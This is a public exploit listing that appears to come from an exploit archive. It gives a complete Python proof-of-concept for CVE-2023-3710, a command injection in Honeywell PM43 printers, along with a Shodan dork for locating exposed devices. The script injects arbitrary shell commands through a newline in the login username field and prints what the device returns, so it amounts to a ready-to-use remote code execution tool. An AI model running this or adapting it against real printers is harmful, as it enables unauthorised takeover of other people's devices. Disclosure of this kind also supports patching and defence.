Share
## https://sploitus.com/exploit?id=PACKETSTORM:177577
#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)  
#- Shodan Dork: http.title:PM43 , PM43  
#- Exploit Author: ByteHunter  
#- Email: 0xByteHunter@proton.me  
#- Frimware Version: versions prior to P10.19.050004  
#- Tested on: P10.17.019667  
#- CVE : CVE-2023-3710  
  
  
import requests  
import argparse  
  
BLUE = '\033[94m'  
YELLOW = '\033[93m'  
RESET = '\033[0m'  
  
def banner():  
banner = """  
โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—  
CVE-2023-3710   
Command Injection in Honeywell PM43 Printers  
Author: ByteHunter   
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•  
"""  
print(YELLOW + banner + RESET)  
  
  
def run_command(url, command):  
full_url = f"{url}/loadfile.lp?pageid=Configure"  
payload = {  
'username': f'hunt\n{command}\n',  
'userpassword': 'admin12345admin!!'  
}  
try:  
response = requests.post(full_url, data=payload, verify=False)  
response_text = response.text  
html_start_index = response_text.find('<html>')  
if html_start_index != -1:  
return response_text[:html_start_index]  
else:  
return response_text   
except requests.exceptions.RequestException as e:  
return f"Error: {e}"  
  
def main():  
parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')  
parser.add_argument('--url', dest='url', help='Target URL', required=True)  
parser.add_argument('--run', dest='command', help='Command to execute', required=True)  
  
args = parser.parse_args()  
  
response = run_command(args.url, args.command)  
print(f"{BLUE}{response}{RESET}")  
  
if __name__ == "__main__":  
banner()  
main()